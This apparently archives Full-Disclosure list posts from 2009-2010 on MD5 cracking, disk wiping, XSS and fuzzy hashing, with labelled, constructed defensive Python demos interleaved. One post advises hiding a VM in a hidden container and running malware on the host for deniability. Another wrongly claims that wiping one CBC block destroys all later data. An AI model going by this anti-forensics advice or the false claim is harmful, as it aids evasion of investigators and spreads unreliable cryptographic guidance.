 Having said that, it would take one heck of a botnet to brute-force an
 MD5 hash
 in 1 or 2 days. Given 1 billion keys/second, a true brute force of MD5
 would
 take on the order of 10**22 years.  If all 140 million zombied computers
 on the
 internet were trying 1 billion keys per second, that drops it down to
 10**16
 years or so - or about 10,000 times the universe has been around
 already.

 I suspect they're actually doing a dictionary attack, which has a good
 chance
 of succeeding in a day or two.


 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/








-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da


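The precomputed-table approach discussed in this thread, seen from the defender's side, as an added example that is not part of the original messages: a table of MD5 digests built once from a known-password list matches every unsalted hash it covers, while a per-user salt with PBKDF2 leaves the same table with nothing to match. The word list, user names and iteration count are constructed for the illustration.

```python
import hashlib
import hmac
import os

# Constructed sample data: a short "known passwords" list and a user store.
KNOWN_PASSWORDS = ["password", "123456", "letmein", "qwerty", "dragon"]
USERS = {
    "alice": "letmein",
    "bob": "password",
    "carol": "T7#vq9!mZp2&",
    "dave": "password",
}
PBKDF2_ITERATIONS = 50_000  # assumed demo value; size it to your own hardware


def md5_hex(password):
    return hashlib.md5(password.encode()).hexdigest()


def build_lookup_table(words):
    """Digest -> password, computed once and reusable against any unsalted dump."""
    return {md5_hex(w): w for w in words}


def store_unsalted(users):
    """The weak scheme: one bare MD5 per user."""
    return {name: md5_hex(pw) for name, pw in users.items()}


def store_salted(users):
    """The hardened scheme: random 16-byte salt per user plus PBKDF2-HMAC-SHA256."""
    records = {}
    for name, pw in users.items():
        salt = os.urandom(16)
        digest = hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, PBKDF2_ITERATIONS)
        records[name] = (salt, digest)
    return records


def verify_salted(record, candidate):
    """Login check for the salted scheme, with a constant-time comparison."""
    salt, digest = record
    probe = hashlib.pbkdf2_hmac("sha256", candidate.encode(), salt, PBKDF2_ITERATIONS)
    return hmac.compare_digest(probe, digest)


def table_hits(table, stored):
    """Users whose stored digest (hex) appears in the precomputed table."""
    return {name: table[d] for name, d in stored.items() if d in table}


def audit():
    table = build_lookup_table(KNOWN_PASSWORDS)
    unsalted = store_unsalted(USERS)
    salted = store_salted(USERS)
    return {
        "unsalted_hits": table_hits(table, unsalted),
        "salted_hits": table_hits(table, {n: d.hex() for n, (_, d) in salted.items()}),
        # Same password, same digest: one lookup exposes every such account.
        "unsalted_shared": unsalted["bob"] == unsalted["dave"],
        # Same password, different salt: the stored records are unrelated.
        "salted_shared": salted["bob"][1] == salted["dave"][1],
    }


if __name__ == "__main__":
    for key, value in audit().items():
        print(key, value)
```

The salt does not make a weak password strong; it forces one full PBKDF2 computation per candidate per user, which removes the one-time precomputation the table relies on.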

Re: [Full-disclosure] Disk wiping -- An alternate approach?

2010-01-27 Thread T Biehn
No you don't understand, your premise is shit. Research what's already being
done instead of trying to improve what you don't understand.

lol @ ddos.

On Jan 26, 2010 11:09 PM, Bipin Gautam bipin.gau...@gmail.com wrote:

Enough noise, Lets wrap up:

Someone said: Forensics requires more than merely finding a phrase or
file on a hard drive - it requires establishing the context. If a
court accepts evidence without that context, then the defendant should
appeal on the basis of having an incompetent lawyer.

So, any evidence/broken-text/suspicious phrases etc found in a
computer without meta-data maybe USELESS... REMEMBER.


Having a normal OS with forensic signature ZERO would be a simple yet
powerful project. Programmers??? it isn't difficult work. few
months, 1 person project.

Worm defense is smart as well as deadlock at times, the perspective i
presented can be used as a FALLBACK at times.


Maybe something like Alice/chatterbox run through the
free/slack/etc... space of your 1 TB harddisk is an intellectual dDoS!


Re: [Full-disclosure] Disk wiping -- An alternate approach?

2010-01-27 Thread T Biehn
You made the argument against yourself; apparently you didn't comprehend the
points made in 90% of the on-topic responses to this thread.

On Jan 27, 2010 9:34 AM, Bipin Gautam bipin.gau...@gmail.com wrote:

McGhee & T Biehn !

Thank you for putting up your best argument sadly that is the
BEST technical thing you happen to pick. in this topic to
comment about

-bipin

On 1/27/10, McGhee, Eddie eddie.mcg...@ncr.com wrote:  and also lol @
maybe USELESS, try making ...

 bipin.gau...@gmail.commailto:bipin.gau...@gmail.com wrote:   Enough
noise, Lets wrap up:  ...

Re: [Full-disclosure] Disk wiping -- An alternate approach?

2010-01-27 Thread T Biehn
Bipin.
I am familiar with LUKS (DMCRYPT), SecurStar's DCPP, TrueCrypt, PGP
Desktop, Windows EFS and all manners of configurations of those
products, including the hidden container features of DCPP and TC.

I am familiar with computer forensics, computer forensic methods, and
anti-forensics. Furthermore I have working knowledge of the various
one-way hashes, symmetric and asymmetric encryption algorithms.
Working knowledge of the various block-cipher modes and what the
differences are between them.

From firsthand experience with the courts I am familiar with their
tool dependence and what they can and cannot grab and why.

From simple logic it is plain to see that filling a drive with content
from wikipedia, some n-gram algorithm or other source would be
worthless. A waste of time and effort.

This is because a drive full of zeros, a drive full of random bits and
a drive full of random word garbage are equivalent.

Some obfuscating filesystem that does -not- use encryption is as
worthless as a generic F-S. If the content on your drive is worth
grabbing the investigating authorities can and will reverse engineer
it.

As everyone has told you, encrypt with a FDE product from the start or
simply wipe your drive to nulls or garbage.

If you are very paranoid use my solution of a hidden container
containing a VM that you use for anything 'private.' Make sure your
host OS has a ream of malware running on it preferably pointed to
non-existent C&C channels, or using PKI for which nobody has the
private key.

-Travis

On Wed, Jan 27, 2010 at 11:18 AM, Bipin Gautam bipin.gau...@gmail.com wrote:
 Really? How much do you know of computer forensics? Care to Double
 clicked a few forensic tools first

 I bring up this issue here because as you can see the laws are
 different in different country and at places just possession of a
 questionable content is a crime, without much analysis from where did
 it come from. Such a logic doesn't hold much water from a technical
 perspective, that is what i was trying to discuss. (but you were so
 much concerned about my English lol )

 We were talking on a NEW topic, But if truecrypt is all you know, then
 download truecrypt and add a custom cascade of ciphers to your
 truecrypt source code... so that your truecrypt hidden volume will be
 very hard to brute-force with off-the-shelf tools (which is what most
 forensic examiners do, they are tool dependent).

 (i  wish to make fun of you, but maybe another email! ;)


 -bipin


 On 1/27/10, T Biehn tbi...@gmail.com wrote:
 You made the argument against yourself; apparently you didn't comprehend the
 points made in 90% of the on-topic responses to this thread.

 On Jan 27, 2010 9:34 AM, Bipin Gautam bipin.gau...@gmail.com wrote:

 McGhee & T Biehn !

 Thank you for putting up your best argument sadly that is the
 BEST technical thing you happen to pick. in this topic to
 comment about

 -bipin

 On 1/27/10, McGhee, Eddie eddie.mcg...@ncr.com wrote:  and also lol @
 maybe USELESS, try making ...

 bipin.gau...@gmail.commailto:bipin.gau...@gmail.com wrote:   Enough
 noise, Lets wrap up:  ...







Re: [Full-disclosure] Disk wiping -- An alternate approach?

2010-01-26 Thread T Biehn
Entropy vs zeros vs random content.

Plausible deniability will only be there if there is legitimate data
that looks like it's been used and the prosecutor cannot construe any
of your data as that used for wiping or otherwise obscuring the data
on your drive. If you don't have this you better request a trial by
judge rather than jury.

Now;
Your best solution is to use an exterior OS on FDE, then, in a TC
Hidden Disk container have a VM image that you use for 'hidden works.'
You can hand over your FDE's PW and location of TC disk including the
exterior password for great fed win.

-Travis

On Tue, Jan 26, 2010 at 10:08 AM, Michael Holstein
michael.holst...@csuohio.edu wrote:

 By the way, does somebody knows about the flash memory?
 Is zeroing a whole usb key enough to make the data unrecoverable?


 No, wear-leveling (done at the memory controller level) will dynamically
 re-map addresses on the actual flash chip to ensure a relatively
 consistent number of write cycles across the entire drive.

 The only way to completely wipe a flash disk is with a hammer.

 Regards,

 Michael Holstein
 Cleveland State University


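The wear-leveling point in the quoted reply, as an added simulation that is not part of the original thread: a toy flash translation layer in which the host zeroes every logical block, yet a raw read of the physical pages still finds old data in the spare area. The page counts, payload strings and remapping policy are assumptions constructed for the illustration.

```python
PAGE = 16  # bytes per page in this toy device


class ToyFlash:
    """Toy flash translation layer: logical blocks remapped onto physical pages.

    Assumed policy (constructed for the demo): every write goes to a fresh page,
    the superseded page is only marked stale, and one stale page is erased when
    no free page is left. Real controllers use their own undisclosed policies.
    """

    def __init__(self, logical_blocks, physical_pages):
        if physical_pages <= logical_blocks:
            raise ValueError("the model needs spare (over-provisioned) pages")
        self.logical_blocks = logical_blocks
        self.pages = [None] * physical_pages   # None means erased
        self.erase_count = [0] * physical_pages
        self.mapping = {}                      # logical block -> physical page
        self.stale = []                        # superseded pages, oldest first

    def _take_free_page(self):
        free = [p for p, data in enumerate(self.pages) if data is None]
        if not free:
            # Garbage collection: erase exactly one stale page, oldest first.
            victim = self.stale.pop(0)
            self.pages[victim] = None
            self.erase_count[victim] += 1
            free = [victim]
        # Wear leveling: prefer the least-erased free page.
        return min(free, key=lambda p: (self.erase_count[p], p))

    def write(self, lba, data):
        target = self._take_free_page()
        self.pages[target] = data.ljust(PAGE, b"\0")[:PAGE]
        if lba in self.mapping:
            self.stale.append(self.mapping[lba])  # old copy stays on the chip
        self.mapping[lba] = target

    def read(self, lba):
        """What the host sees through the normal block interface."""
        page = self.mapping.get(lba)
        return bytes(PAGE) if page is None else self.pages[page]

    def raw_pages(self):
        """What a chip-level read sees: every programmed page, mapped or not."""
        return [data for data in self.pages if data is not None]


def wipe_experiment(logical_blocks=8, physical_pages=12):
    dev = ToyFlash(logical_blocks, physical_pages)
    for lba in range(logical_blocks):      # constructed "sensitive" data
        dev.write(lba, b"SECRET-%02d" % lba)
    for lba in range(logical_blocks):      # host zeroes the whole device once
        dev.write(lba, bytes(PAGE))
    host_view = [dev.read(lba) for lba in range(logical_blocks)]
    remnants = [p.rstrip(b"\0") for p in dev.raw_pages() if p.startswith(b"SECRET")]
    return host_view, remnants


if __name__ == "__main__":
    host_view, remnants = wipe_experiment()
    print("host sees only zeros:", all(b == bytes(PAGE) for b in host_view))
    print("pages still holding old data:", remnants)
```

In this model the number of surviving pages equals the number of spare pages, and the host interface offers no way to see or address them.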

Re: [Full-disclosure] Disk wiping -- An alternate approach?

2010-01-26 Thread T Biehn
Oh yeah, another note: If you use a chaining block cipher then you
only need to wipe the first block to make the rest of your data
unrecoverable. Most FDE's actually use a pw to decrypt the actual
decryption key, that block functions much the same, if you can wipe
that then the rest of the data is unusable.
Note, anyone who has pulled your key from memory via trojan or other
means at an earlier time will be able to recover your data unless the
first block of the stream has been wiped. This might be common
practice in sneak and peek routines.

-Travis

On Tue, Jan 26, 2010 at 11:04 AM, Christian Sciberras uuf6...@gmail.com wrote:
 I was thinking, since all this (reasonable) fuss on wiping a disk over 10
 times to ensure non-readability, how come we're yet very limited on space
 usage?
 If, for example, I overwrote a bitmap file with a text one, what stops the
 computer from recovering/storing both (without using additional space)?
 Just a couple curiosities of mine.





 On Tue, Jan 26, 2010 at 4:08 PM, Michael Holstein
 michael.holst...@csuohio.edu wrote:

  By the way, does somebody knows about the flash memory?
  Is zeroing a whole usb key enough to make the data unrecoverable?
 

 No, wear-leveling (done at the memory controller level) will dynamically
 re-map addresses on the actual flash chip to ensure a relatively
 consistent number of write cycles across the entire drive.

 The only way to completely wipe a flash disk is with a hammer.

 Regards,

 Michael Holstein
 Cleveland State University


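The two wipes described in the message above, as an added example that is not part of the original post: it encrypts eight blocks in CBC mode under a master key wrapped by a passphrase, then reports which plaintext blocks still decrypt after (1) zeroing the first ciphertext block, (2) zeroing the key header, and (3) zeroing the header when the master key was captured earlier. The 4-round Feistel cipher is a constructed stand-in for a real block cipher, and the volume layout, names and passphrase are assumptions.

```python
import hashlib
import os

BLOCK = 16  # bytes


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _f(key, rnd, half):
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]


def toy_encrypt_block(key, block):
    """Stand-in 128-bit block cipher (4-round Feistel over SHA-256). Demo only."""
    left, right = block[:8], block[8:]
    for rnd in range(4):
        left, right = right, _xor(left, _f(key, rnd, right))
    return left + right


def toy_decrypt_block(key, block):
    left, right = block[:8], block[8:]
    for rnd in reversed(range(4)):
        left, right = _xor(right, _f(key, rnd, left)), left
    return left + right


def cbc_encrypt(key, iv, plaintext):
    out, prev = [], iv
    for i in range(0, len(plaintext), BLOCK):
        prev = toy_encrypt_block(key, _xor(plaintext[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key, iv, ciphertext):
    out, prev = [], iv
    for i in range(0, len(ciphertext), BLOCK):
        cur = ciphertext[i:i + BLOCK]
        out.append(_xor(toy_decrypt_block(key, cur), prev))
        prev = cur
    return b"".join(out)


def _kek(passphrase, salt):
    return hashlib.pbkdf2_hmac("sha256", passphrase.encode(), salt, 10_000, dklen=BLOCK)


def make_volume(passphrase, plaintext):
    """Header = salt + master key wrapped under the passphrase; body = IV + CBC data."""
    master_key, salt, iv = os.urandom(BLOCK), os.urandom(BLOCK), os.urandom(BLOCK)
    header = salt + toy_encrypt_block(_kek(passphrase, salt), master_key)
    return header, iv + cbc_encrypt(master_key, iv, plaintext), master_key


def unlock(passphrase, header):
    return toy_decrypt_block(_kek(passphrase, header[:BLOCK]), header[BLOCK:])


def intact_blocks(original, master_key, body):
    """Indexes of plaintext blocks that decrypt back to their original content."""
    recovered = cbc_decrypt(master_key, body[:BLOCK], body[BLOCK:])
    return [i // BLOCK for i in range(0, len(original), BLOCK)
            if original[i:i + BLOCK] == recovered[i:i + BLOCK]]


def demo():
    passphrase = "constructed demo passphrase"
    plaintext = b"".join(b"block-%02d-secret!" % n for n in range(8))
    header, body, captured_key = make_volume(passphrase, plaintext)

    # Case 1: zero the first ciphertext block only; the header is untouched.
    body_c0_wiped = body[:BLOCK] + bytes(BLOCK) + body[2 * BLOCK:]
    case1 = intact_blocks(plaintext, unlock(passphrase, header), body_c0_wiped)

    # Case 2: zero the header; the passphrase now unwraps to a wrong key.
    case2 = intact_blocks(plaintext, unlock(passphrase, bytes(len(header))), body)

    # Case 3: header zeroed, but the master key was captured from memory earlier.
    case3 = intact_blocks(plaintext, captured_key, body)
    return {"first_block_wiped": case1,
            "header_wiped_passphrase_only": case2,
            "header_wiped_key_captured": case3}


if __name__ == "__main__":
    for name, blocks in demo().items():
        print(name, blocks)
```

In CBC each plaintext block depends only on its own ciphertext block and the one before it, so case 1 loses blocks 0 and 1 and nothing else; only destroying every copy of the key material (case 2) makes the whole volume unreadable.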

Re: [Full-disclosure] Disk wiping -- An alternate approach?

2010-01-26 Thread T Biehn
Overwritten files require analysis with a 'big expensive machine.'
I doubt they ever recover the full file.

-Travis

On Tue, Jan 26, 2010 at 11:04 AM, Christian Sciberras uuf6...@gmail.com wrote:
 I was thinking, since all this (reasonable) fuss on wiping a disk over 10
 times to ensure non-readability, how come we're yet very limited on space
 usage?
 If, for example, I overwrote a bitmap file with a text one, what stops the
 computer from recovering/storing both (without using additional space)?
 Just a couple curiosities of mine.





 On Tue, Jan 26, 2010 at 4:08 PM, Michael Holstein
 michael.holst...@csuohio.edu wrote:

  By the way, does somebody knows about the flash memory?
  Is zeroing a whole usb key enough to make the data unrecoverable?
 

 No, wear-leveling (done at the memory controller level) will dynamically
 re-map addresses on the actual flash chip to ensure a relatively
 consistent number of write cycles across the entire drive.

 The only way to completely wipe a flash disk is with a hammer.

 Regards,

 Michael Holstein
 Cleveland State University



Re: [Full-disclosure] Disk wiping -- An alternate approach?

2010-01-26 Thread T Biehn
Are you suggesting that consumer magnet-based storage solutions use
the same technology that the recovery machines use to store more than
one bit in what you consider a 'single bit location' ?
I think it would be cost and space prohibitive, not dependent on any algorithm.
If I'm thinking correctly, and I have no real idea how the recovery
process works, the recovery machines measure minute variance in the
analog magnetic signal directly pulled from the platters to figure out
what bits 'used' to be on the disk in that location. I sincerely doubt
that anything consumer accessible would be able to work with that. I
also doubt that it is exact, and protocols probably use probabilistic
methods for extraction of a given content; text for example.
Given a block of bits, the signal variance from 'clean' on those bits
(eg if never written) is x.
x is matched with a dictionary of known text.

Anyone know to confirm?

-Travis

On Tue, Jan 26, 2010 at 11:15 AM, Christian Sciberras uuf6...@gmail.com wrote:
 It would be a part of the algorithm, to make sure the overwritten file is
 readable. But if those machines get any smaller, I guess these would be the
 next generation of storage media take bluerays vs dvds for example.




 On Tue, Jan 26, 2010 at 5:11 PM, T Biehn tbi...@gmail.com wrote:

 Overwritten files require analysis with a 'big expensive machine.'
 I doubt they ever recover the full file.

 -Travis

 On Tue, Jan 26, 2010 at 11:04 AM, Christian Sciberras uuf6...@gmail.com
 wrote:
  I was thinking, since all this (reasonable) fuss on wiping a disk over
  10
  times to ensure non-readability, how come we're yet very limited on
  space
  usage?
  If, for example, I overwrote a bitmap file with a text one, what stops
  the
  computer from recovering/storing both (without using additional space)?
  Just a couple curiosities of mine.
 
 
 
 
 
  On Tue, Jan 26, 2010 at 4:08 PM, Michael Holstein
  michael.holst...@csuohio.edu wrote:
 
   By the way, does somebody knows about the flash memory?
   Is zeroing a whole usb key enough to make the data unrecoverable?
  
 
  No, wear-leveling (done at the memory controller level) will
  dynamically
  re-map addresses on the actual flash chip to ensure a relatively
  consistent number of write cycles across the entire drive.
 
  The only way to completely wipe a flash disk is with a hammer.
 
  Regards,
 
  Michael Holstein
  Cleveland State University
 


Re: [Full-disclosure] Disk wiping -- An alternate approach?

2010-01-26 Thread T Biehn
I should have brought up the increased density problem Valdis, excellent points.

-Travis

On Tue, Jan 26, 2010 at 1:26 PM,  valdis.kletni...@vt.edu wrote:
 On Tue, 26 Jan 2010 11:11:52 EST, T Biehn said:
 Overwritten files require analysis with a 'big expensive machine.'

 Assuming a disk drive made this century, if the block has actually been
 overwritten with any data even *once*, it is basically unrecoverable using any
 available tech.

 Proof: In a decade of looking, I haven't found a *single* data-recovery outfit
 that claimed to recover from even a single overwrite.  Blown partition table?
 No problem. Metadata overwritten, data not? We can scavenge the blocks. Disk
 been in a fire? Flood? Run over by truck? Sure. We can go in and scavenge the
 individual intact bits with big expensive machines. Overwritten? crickets.

 Seriously - lot of companies can recover data by reading the magnetic fields 
 of
 intact data.  But anybody know of one that claims it can recover actual
 over-writes, as opposed to damn we erased it or damn the first part of the
 disk is toast?

 No?  Nobody knows of one?  I didn't think so.

 20 or 25 years ago, it may still have been feasible to use gear to measure the
 residual magnetism in the sidebands after an over-write.   However, those
 sidebands have shrunk drastically, as they are the single biggest problem when
 trying to drive densities higher.  You can't afford a sideband anymore - if
 you have one, it's overlapping the next bit.

 There *may* be some guys inside the spook agencies able to recover overwrites.
 But you don't need to worry about any evidence so recovered ever being used
 against you in a court of law - as then they'd have to admit they could do it.
 Just like in WWII we allowed the German U-boats to sink our convoys rather
 than let them figure out we had broken Enigma, they'll let the prosecution
 fail rather than admit where the data came from.







Re: [Full-disclosure] Disk wiping -- An alternate approach?

2010-01-26 Thread T Biehn
Unknown malware? Infections recently deleted by A/V?

The realm of data ownership is ridiculous. If I run a wifi AP with
WEP or no auth, my router keeps no logs, and my computer is a host to
malware then I would imagine that I cannot be convicted of a computer
crime without verification by physical surveillance.

If given the choice by a lawyer between pleading guilty and receiving
a lenient punishment and pleading not-guilty to certain loss for
severe punishment in the face of 'irrefutable' evidence most people
will choose to plead guilty. Prosecutors, Lawyers, and defendants are
largely either ignorant or apathetic to the issues around proving
culpability in computer-crime.

And case law would back me up.

-Travis

On Tue, Jan 26, 2010 at 3:11 AM, Charles Skoglund
charles.skogl...@bitsec.se wrote:
 This discussion is getting weirder and weirder. If an examiner finds
 evidence on YOUR computer / cell phone / usb disks / whatever, please do
 tell me how it's not necessarily yours? By claiming your computer has been
 hacked? You do know an examiner usually knows how to double-check your story
 for malicious code right? Or what are you guys talking about?

 My experience is that when I find the evidence, the person/s being
 investigated confesses quite rapidly.

 Cheers!



 On 1/26/10 4:31 AM, Bipin Gautam bipin.gau...@gmail.com wrote:

 So to the point, the techniques of forensic examiners were flawed from
 day one given that any text/evidence found on your computer is NOT
 NECESSARILY yours! Does that break digital forensics?
 oops.



Re: [Full-disclosure] Two MSIE 6.0/7.0 NULL pointer crashes

2010-01-20 Thread T Biehn
Do you really want to be buying
an entire operating system from somebody who just admitted they can't even
produce a workable browser with all their resources?

Valdis makes the novice assumption that people consider valuations of
this sort when buying the newest iteration of Microsoft products. The
idea that consumers would actually consider an alternative to what is
an effectively locked in platform is laughable. The suggestion that
they might find such a move to be of any relevance or impact on their
purchasing decision is insane.


On Wed, Jan 20, 2010 at 1:00 PM,  valdis.kletni...@vt.edu wrote:
 On Wed, 20 Jan 2010 10:38:34 EST, James Matthews said:

 Why doesn't microsoft throw some of its weight behind Mozilla and ditch IE
 forever. It doesn't suit their image.

 Unfortunately, the PR doesn't work that way.  Do you really want to be buying
 an entire operating system from somebody who just admitted they can't even
 produce a workable browser with all their resources?

 (Note this works differently in the Linux world, where the kernel crew doesn't
 even pretend to write browsers, and the Firefox crew *just* does browsers, and
 somebody else *just* does OpenOffice, and distros (for the most part) just 
 worry
 about integration issues, and everybody only claims to do their little part
 well)



Re: [Full-disclosure] MouseOverJacking attacks

2010-01-19 Thread T Biehn
Hello MustLive!
Thanking you for taking a personal approach to all of your list admirers!

Prosperous futures abound!

A missive granted in thy honor sweet prince of XSS.

On Sun, Jan 17, 2010 at 4:33 PM, MustLive mustl...@websecurity.com.ua wrote:
 Hello Travis!

 Thanks for your attention to my article about MouseOverJacking attacks.

 If you read the HTML specification you can find all sorts of XSS
 attack vectors that people just assumed would be redundant to write
 entire articles on!

 Yes, I'm familiar with HTML specification (as web developer from beginning
 of 1999) and I know about different events in HTML. And as web security
 professional I know a lot of XSS vectors.

 Many of the events in HTML are not widespread enough (or not usable enough) for
 XSS attacks to write entire articles about them, but such ones as onclick
 and onmouseover are those which are worth entire articles. A lot was said
 about attacks via onclick in 2008, so I decided to speak about onmouseover in
 2009 (because it is worth it).

 P.S.

 Because Jeff is already in my blacklist, as I mentioned to the list, so in
 the future no need to send me his letters. If you'll decide to answer me,
 than write me directly.

 Best wishes & regards,
 MustLive
 Administrator of Websecurity web site
 http://websecurity.com.ua

 - Original Message - From: T Biehn tbi...@gmail.com
 To: Jeff Williams jeffwilli...@gmail.com
 Cc: MustLive mustl...@websecurity.com.ua;
 full-disclosure@lists.grok.org.uk
 Sent: Tuesday, January 05, 2010 4:53 PM
 Subject: Re: [Full-disclosure] MouseOverJacking attacks


 Hey MustLive!
 If you read the HTML specification you can find all sorts of XSS
 attack vectors that people just assumed would be redundant to write
 entire articles on!

 Here!
 http://www.w3.org/TR/REC-html40/interact/scripts.html

 -Travis

 On Sun, Jan 3, 2010 at 10:29 PM, Jeff Williams jeffwilli...@gmail.com
 wrote:

 Thanks for your wishes MustDie;

 Do you consider yourself as an oz XSS ninja ?

 Did your C.V. end in the OWASP trash bin ?

 And how the fuck you came up with a nickname like that ?



 Let us know, we truly give a shit about your life, and xss.




Re: [Full-disclosure] [Tool] DeepToad 1.1.0

2010-01-05 Thread T Biehn
Hmm,
Wouldn't it be more useful to the sec community to have an algorithm
that abstracts at the -interpreted- content level? That is when
analyzing binaries I wouldn't think that this would classify two with
near identical functionality together, even though it is removing a
significant chunk of information during the hash pass.

I would largely assume that your algorithm, as is, works best on
uncompressed bitmaps. Is there something I'm missing?

-Travis

On Sun, Jan 3, 2010 at 6:37 AM, Joxean Koret joxeanko...@yahoo.es wrote:
 Hi all,

 I'm happy to announce the very first public release of the open source
 project DeepToad, a tool for computing fuzzy hashes from files.

 DeepToad can generate signatures, clusterize files and/or directories
 and compare them. It's inspired in the very good tool ssdeep [1] and, in
 fact, both projects are very similar.

 The complete project is written in pure python and is distributed under
 the LGPL license [2].

 Links:
 Project's Web Page http://code.google.com/p/deeptoad/
 Download Web Page http://code.google.com/p/deeptoad/downloads/list
 Wiki http://code.google.com/p/deeptoad/w/list

 References:
 [1] http://ssdeep.sourceforge.net/
 [2] http://www.gnu.org/licenses/lgpl.html

 Regards & Happy new year!
 Joxean Koret




Re: [Full-disclosure] MouseOverJacking attacks

2010-01-05 Thread T Biehn
Hey MustLive!
If you read the HTML specification you can find all sorts of XSS
attack vectors that people just assumed would be redundant to write
entire articles on!

Here!
http://www.w3.org/TR/REC-html40/interact/scripts.html

-Travis

On Sun, Jan 3, 2010 at 10:29 PM, Jeff Williams jeffwilli...@gmail.com wrote:
 Thanks for your wishes MustDie;

 Do you consider yourself as an oz XSS ninja ?

 Did your C.V. end in the OWASP trash bin ?

 And how the fuck you came up with a nickname like that ?



 Let us know, we truly give a shit about your life, and xss.




Re: [Full-disclosure] [Tool] DeepToad 1.1.0

2010-01-05 Thread T Biehn
I can see what you're saying, it could be useful for finding
differences in different versions of the same binary but from what I
can see Joxean's app is meant to group files of the same 'type,' not
provide 'diff' capabilities.

-Travis

On Tue, Jan 5, 2010 at 9:51 AM, Dan Kaminsky d...@doxpara.com wrote:
 I looked into a fair amount of this sort of normalization back when I was
 playing with dotplots.  The idea was to upgrade from simple Levenshtein
 string comparison (with no knowledge of variable length x86 instructions,
 pointers that shift from compile to compile, etc) to something with at least
 some domain specific knowledge.  What I found, somewhat surprisingly, was
 that dumb string comparison was more than enough.  In fact, when I compared
 pre-patch and post-patch builds, it was easy to directly see when content
 was added, removed, shifted in location, etc.  Joxean's going to have much
 the same result -- as basic as his similarity metric is, he'll get the broad
 strokes just fine.

 Ultimately the best approach is to build a graph of how functions interact
 and measure graph isomorphism, but of course Halvar figured that out years
 ago :)

 On Tue, Jan 5, 2010 at 3:41 PM, T Biehn tbi...@gmail.com wrote:

 Hmm,
 Wouldn't it be more useful to the sec community to have an algorithm
 that abstracts at the -interpreted- content level? That is when
 analyzing binaries I wouldn't think that this would classify two with
 near identical functionality together, even though it is removing a
 significant chunk of information during the hash pass.

 I would largely assume that your algorithm, as is, works best on
 uncompressed bitmaps. Is there something I'm missing?

 -Travis

 On Sun, Jan 3, 2010 at 6:37 AM, Joxean Koret joxeanko...@yahoo.es wrote:
  Hi all,
 
  I'm happy to announce the very first public release of the open source
  project DeepToad, a tool for computing fuzzy hashes from files.
 
  DeepToad can generate signatures, clusterize files and/or directories
  and compare them. It's inspired in the very good tool ssdeep [1] and, in
  fact, both projects are very similar.
 
  The complete project is written in pure python and is distributed under
  the LGPL license [2].
 
  Links:
  Project's Web Page http://code.google.com/p/deeptoad/
  Download Web Page http://code.google.com/p/deeptoad/downloads/list
  Wiki http://code.google.com/p/deeptoad/w/list
 
  References:
  [1] http://ssdeep.sourceforge.net/
  [2] http://www.gnu.org/licenses/lgpl.html
 
  Regards & Happy new year!
  Joxean Koret
 
 





-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
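
Added example, not part of the thread and not DeepToad's or ssdeep's code: a simplified sketch of context-triggered piecewise hashing, the idea behind ssdeep, showing why a small insertion leaves most of a fuzzy signature intact while a cryptographic hash changes completely. All function names are hypothetical and the "builds" are constructed random bytes.

```python
import hashlib
import random

WINDOW = 7    # bytes of context the rolling hash looks at
BLOCK = 64    # a piece boundary fires on average once per BLOCK bytes
ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
FNV_BASIS, FNV_PRIME = 0x811C9DC5, 0x01000193   # 32-bit FNV-1a constants


def fuzzy_signature(data: bytes) -> str:
    """Return one signature character per content-defined piece of the input."""
    sig = []
    rolling = 0
    piece = FNV_BASIS
    for i, byte in enumerate(data):
        rolling += byte
        if i >= WINDOW:
            rolling -= data[i - WINDOW]          # sum over the last WINDOW bytes only
        piece = ((piece ^ byte) * FNV_PRIME) & 0xFFFFFFFF
        if rolling % BLOCK == BLOCK - 1:         # boundary depends only on local content
            sig.append(ALPHABET[piece & 63])
            piece = FNV_BASIS                    # next piece starts fresh
    sig.append(ALPHABET[piece & 63])             # trailing piece after the last boundary
    return "".join(sig)


def edit_distance(a: str, b: str) -> int:
    """Plain Levenshtein distance, row by row."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def similarity(sig_a: str, sig_b: str) -> int:
    """Score 0..100 from the edit distance between two signatures."""
    longest = max(len(sig_a), len(sig_b))
    if longest == 0:
        return 100
    return round(100 * (1 - edit_distance(sig_a, sig_b) / longest))


def demo() -> dict:
    rng = random.Random(2010)
    # Constructed stand-ins for a pre-patch build, a post-patch build and an unrelated file.
    original = bytes(rng.getrandbits(8) for _ in range(4096))
    patch = bytes(rng.getrandbits(8) for _ in range(24))
    patched = original[:2000] + patch + original[2000:]
    unrelated = bytes(rng.getrandbits(8) for _ in range(4096))

    sig_original = fuzzy_signature(original)
    sig_patched = fuzzy_signature(patched)
    return {
        "sig_original": sig_original,
        "sig_patched": sig_patched,
        "self": similarity(sig_original, sig_original),
        "patched": similarity(sig_original, sig_patched),
        "unrelated": similarity(sig_original, fuzzy_signature(unrelated)),
        "sha256_equal": hashlib.sha256(original).digest() == hashlib.sha256(patched).digest(),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Because boundaries are chosen from the last few bytes of content, the signature resynchronises after the inserted bytes; that is what makes it suitable for grouping similar files, not for showing what changed.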


Re: [Full-disclosure] security hole on local ISP

2009-12-29 Thread T Biehn
This is an orgiastic dump of information, you must really hate ETB; or
you must be really excited for lulz.

-Travis

On Tue, Dec 29, 2009 at 5:23 AM, Cilia Pretel Gallo
cpretelga...@yahoo.com wrote:
 I've recently discovered a security hole on the modems (which double as 
